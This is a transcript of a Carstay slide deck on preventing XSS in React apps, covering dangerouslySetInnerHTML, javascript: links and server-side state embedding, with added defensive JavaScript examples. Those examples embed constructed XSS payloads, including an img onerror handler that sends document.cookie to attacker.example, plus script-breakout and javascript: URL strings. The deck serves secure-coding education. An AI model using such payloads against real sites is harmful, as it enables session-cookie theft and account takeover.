
Security Measures for Frontend Engineers (フロントエンドエンジニアのためのセキュリティ対策)

CarstayJP
February 26, 2022


Transcript

1. Security measures frontend engineers should also know about: XSS edition. 2022/02/26

2. Carstay Inc.: Overview

3. Carstay Inc.: Mission. Stay Anywhere, Anytime. Build a world where anyone can spend time wherever, whenever and with whomever they like.

4. Carstay Inc.: Product. "Carstay" is the only smartphone app in Japan that lets you book camper vans and car-camping spots. Registered on it are vehicle owners who want to share their idle vehicles while they are not driving them, and parking-lot owners who want to put unused land to use.

5. About me. Ngo Van Thang | Full-stack engineer
▼ Career
・2014: came to Japan after graduating
・2014: joined a social-game operator (game server operations)
・2016: joined a staffing company (developed a coding-test service and a LINE delivery service)
・2018: joined a blockchain company (developed a blockchain-based matching service for creators and companies, and a cross-border e-commerce site)
・2020: joined Carstay Inc. | Tech Lead (overall development management, code review, web and app development)
▼ Hobbies
・Games (action games, FPS, etc.)
・Football
・Likes the command line
Ngo Van Thang (30) @nooptr https://www.facebook.com/thanghedspi
6. Agenda • How the vulnerability (XSS) works and how to counter it • Demo • Summary

7. Website vulnerabilities by type (by year). [Pie chart, source https://www.ipa.go.jp/files/000082044.pdf: slices of 58%, 13%, 11%, 11%, 3%, 2% and 2% over the categories XSS (cross-site scripting), DNS misconfiguration, SQL injection, improperly exposed files, directory traversal, improper use of HTTPS, and other. XSS is the largest slice at 58%.]
8. XSS: cross-site scripting

9. What is XSS (cross-site scripting)? An attack technique that abuses a flaw in a website built to display content entered by users: the attacker delivers a malicious script of their own making to the user's browser and has it execute there, in the context of the site.

10. How XSS works. Source: https://yamory.io/blog/about-xss/

11. XSS in React

12. dangerouslySetInnerHTML ▪ What dangerouslySetInnerHTML is ・An option that switches off React's built-in escaping ・Used when the string must be interpreted as HTML rather than shown as text

13. dangerouslySetInnerHTML ▪ What dangerouslySetInnerHTML is ・An option that switches off React's built-in escaping ・Used when the string must be interpreted as HTML rather than shown as text. DEMO: https://codesandbox.io/s/react-xss-example-forked-9n3exm

14. dangerouslySetInnerHTML ▪ Countermeasures:
・Don't use it. If you absolutely must, sanitize the input thoroughly before rendering it (escaping it would defeat the purpose of rendering HTML, so strip everything except an allowlist of tags and attributes).
・A library such as DOMPurify does exactly that and removes the XSS problem. https://github.com/cure53/DOMPurify
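The two render paths, as an added example that is not code from the slides or from Carstay. React is not loaded here, so the two render functions below model what React does with a user-supplied string: `escapeHtml` reproduces the escaping React applies to text children (`<div>{comment}</div>`), and `renderCommentRaw` reproduces `dangerouslySetInnerHTML`, which inserts the string as markup. The payload, the attacker host `attacker.example` and all function names are constructed for illustration.

```javascript
// Added example, not code from the slides or from Carstay. React itself is not
// imported; the two render functions model what React does with the two ways a
// user-supplied string can reach the DOM.

// React escapes text children and attribute values like this: the characters
// that can change HTML structure become entities, so markup is displayed as text.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Equivalent of <div className="comment">{comment}</div>
function renderCommentSafe(comment) {
  return `<div class="comment">${escapeHtml(comment)}</div>`;
}

// Equivalent of <div className="comment" dangerouslySetInnerHTML={{ __html: comment }} />:
// React's escaping is switched off and the string is inserted as markup.
function renderCommentRaw(comment) {
  return `<div class="comment">${comment}</div>`;
}

// Constructed attacker input: the image source fails to load, the onerror
// handler runs and sends the session cookie to an attacker-controlled host
// (hypothetical name).
const PAYLOAD =
  `<img src=x onerror="fetch('https://attacker.example/?c='+document.cookie)">`;

// Crude check used only to compare the two outputs: does the markup contain a
// start tag carrying an on* event-handler attribute, which a browser would run?
function hasEventHandlerTag(html) {
  return /<[a-z][^>]*\son[a-z]+\s*=/i.test(html);
}

// Stand-alone run
console.log('safe:', renderCommentSafe(PAYLOAD));
console.log('raw :', renderCommentRaw(PAYLOAD));
console.log('event handler reaches the DOM? safe=%s raw=%s',
  hasEventHandlerTag(renderCommentSafe(PAYLOAD)),
  hasEventHandlerTag(renderCommentRaw(PAYLOAD)));
```

In a real component the escaped path is what `<div>{comment}</div>` already gives you; the sanitized path is `dangerouslySetInnerHTML={{ __html: DOMPurify.sanitize(comment) }}`. Marking the session cookie `HttpOnly` stops this particular payload from reading `document.cookie`, but a script running in the page can still send requests that carry the user's session, so it reduces the impact of an XSS rather than removing it.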

15. javascript: scheme. If an href attribute's value begins with javascript:, everything after it is executed as JavaScript when the link is followed.

16. javascript: scheme. If an href attribute's value begins with javascript:, everything after it is executed as JavaScript when the link is followed. DEMO: https://codesandbox.io/s/react-xss-example-forked-g8hs86

17. javascript: scheme ▪ Countermeasures:
・Restrict the scheme to http:// or https:// only
・Prepend / to the value, so that it is always a path on the current site and can never be read as a scheme
DEMO: https://codesandbox.io/s/react-xss-example-forked-g8hs86
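Both countermeasures from slide 17 in working code, as an added example that is not from the slides or from Carstay. It uses Node's `URL` class, which implements the same WHATWG parsing browsers use, so the spellings a browser would accept as `javascript:` are caught; it goes a little beyond the slide by also showing why a `startsWith('javascript:')` check is not enough and what the `/` prefix does and does not prevent. The base origin `https://example.com`, the fallback value, the sample inputs and all function names are assumptions for illustration.

```javascript
// Added example, not code from the slides or from Carstay: checking a
// user-supplied href before it reaches <a href={...}>. Node's URL class is the
// WHATWG parser browsers use, so the spellings a browser accepts are recognised.
// Base origin, fallback value, inputs and function names are assumptions.

const BASE = 'https://example.com';
const FALLBACK = 'about:blank';
const SAFE_SCHEMES = new Set(['http:', 'https:']);

// Countermeasure 1 (slide 17): allow only http:// and https://.
// Parsing instead of prefix matching matters: the browser ignores case in the
// scheme, strips leading whitespace/control characters and removes tab and
// newline anywhere in the input before it looks at the scheme.
function safeHref(input) {
  let url;
  try {
    url = new URL(input, BASE);
  } catch {
    return FALLBACK; // unparseable input is rejected, not passed through
  }
  return SAFE_SCHEMES.has(url.protocol) ? url.href : FALLBACK;
}

// Stricter variant: the link must also stay on this site. A scheme check alone
// lets "//evil.example/..." through (it is a valid https link, just not ours).
function onSiteHref(input) {
  const href = safeHref(input);
  return href !== FALLBACK && new URL(href).origin === BASE ? href : FALLBACK;
}

// Countermeasure 2 (slide 17): prefix "/" so the value is always a path on the
// current site and can never be read as a scheme.
function prefixedHref(input) {
  return '/' + input;
}

// The check people usually write first; it misses what the browser accepts.
function naiveCheck(input) {
  return !input.startsWith('javascript:');
}

// Where a value would actually navigate if placed in href on this site.
function resolved(href) {
  return new URL(href, BASE).href;
}

// Constructed inputs: plain, case-mangled and whitespace-mangled javascript:,
// a data: URL, a protocol-relative URL, a site path and an absolute link.
const INPUTS = [
  'javascript:alert(document.cookie)',
  'JaVaScRiPt:alert(1)',
  '  java\tscript:alert(1)',
  'data:text/html,<script>alert(1)</script>',
  '//evil.example/phish',
  '/profile/42',
  'https://example.com/help',
];

for (const input of INPUTS) {
  console.log(JSON.stringify(input),
    '| naive:', naiveCheck(input),
    '| safeHref:', safeHref(input),
    '| onSite:', onSiteHref(input),
    '| prefixed:', resolved(prefixedHref(input)));
}
```

The `/` prefix does defeat every `javascript:` spelling, because the value can only ever be a path. It does not make the link stay on your site: prefixing `//evil.example/phish` gives `///evil.example/phish`, which the URL parser resolves to `https://evil.example/phish`, so if the requirement is "links only within our site", check the resolved origin as `onSiteHref` does.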
18. JSON.stringify(str). Vulnerable part: XSS occurs when the following values are included. For server rendering, code like the following exists so that the state can be used on the React side.
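The server-rendering pattern this slide refers to, as an added example that is not code from the slides or from Carstay: the page's own snippet is not in the transcript, so the embed shown here is the common `window.__STATE__ = ${JSON.stringify(state)}` form inside a `<script>` tag, and the state contents, the global name and the function names are assumptions for illustration. It shows the breakout that `JSON.stringify` alone allows and the escaping that closes it.

```javascript
// Added example, not code from the slides or from Carstay: the usual
// server-rendering pattern that hands initial state to the client, and the
// escaping JSON.stringify does not do for you. State contents, the global
// name and the function names are assumptions for illustration.

// The common embed. JSON.stringify escapes quotes, backslashes and control
// characters, but leaves "<" alone. The HTML tokenizer ends a <script>
// element at the first "</script" it sees, regardless of JavaScript string
// quoting, so a value containing that text breaks out of the script into HTML.
function embedStateUnsafe(state) {
  return `<script>window.__STATE__ = ${JSON.stringify(state)};</script>`;
}

// Same JSON, with the characters that matter to the HTML parser written as
// \uXXXX escapes. The result is still valid JSON and evaluates to the same
// value in the browser.
function serializeForScript(state) {
  return JSON.stringify(state)
    .replace(/</g, '\\u003c')       // no "</script", no "<!--"
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')  // line/paragraph separators: harmless in
    .replace(/\u2029/g, '\\u2029'); // modern engines, still escaped for older ones
}

function embedStateSafe(state) {
  return `<script>window.__STATE__ = ${serializeForScript(state)};</script>`;
}

// What an HTML parser would see after the first closing script tag. For a
// correct embed this is empty; anything else is markup the attacker controls.
function markupAfterScript(html) {
  const close = /<\/script>/i.exec(html);
  return close ? html.slice(close.index + close[0].length) : '';
}

// Constructed state: a user-controlled profile field carrying the breakout.
const STATE = {
  user: { id: 42, bio: '</script><img src=x onerror=alert(document.cookie)>' },
};

console.log(embedStateUnsafe(STATE));
console.log('-> leaks into HTML:', JSON.stringify(markupAfterScript(embedStateUnsafe(STATE))));
console.log(embedStateSafe(STATE));
console.log('-> leaks into HTML:', JSON.stringify(markupAfterScript(embedStateSafe(STATE))));
```

Do the escaping at the serialization boundary, not by validating individual fields: any string in the state may have come from a user, and `\u003c` is both valid JSON and a valid JavaScript string escape, so nothing on the client side needs to change.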

19. Is it really safe as long as the ID/password did not leak?

20. No, it is not.

21. DEMO

22. Summary

23. Summary
・The most common vulnerability is XSS
・The XSS countermeasure is to escape strings
・If you don't know how XSS works you will easily build XSS vulnerabilities into your code, so understanding XSS is essential
・Even without knowing the ID/password, anyone who obtains the session cookie can log in as you, so always lock your screen when you step away from your PC

24. Carstay is actively hiring engineers! ☆ CTO-candidate engineer ・Frontend engineer ・App engineer ・Server-side engineer. Language: TypeScript. Frameworks: ReactJS, React Native. Web server: NodeJS. Please feel free to get in touch ⏬
25. Thank you for listening!